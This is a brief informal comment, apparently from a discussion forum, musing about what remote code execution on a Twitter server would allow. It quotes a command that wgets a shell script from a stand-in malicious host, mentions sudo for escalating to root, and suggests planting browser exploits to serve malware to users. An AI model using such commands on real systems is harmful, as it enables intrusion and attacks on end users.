Remote code execution, e.g. he can also execute 'wget http://bad.php.script/shell.php' for planting a shell or 'sudo <command>' for privilege execution (up to root). So pretty much everything you can do on their Twitter servers.
Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.
This is probably not a serious concern for a place as huge as Twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.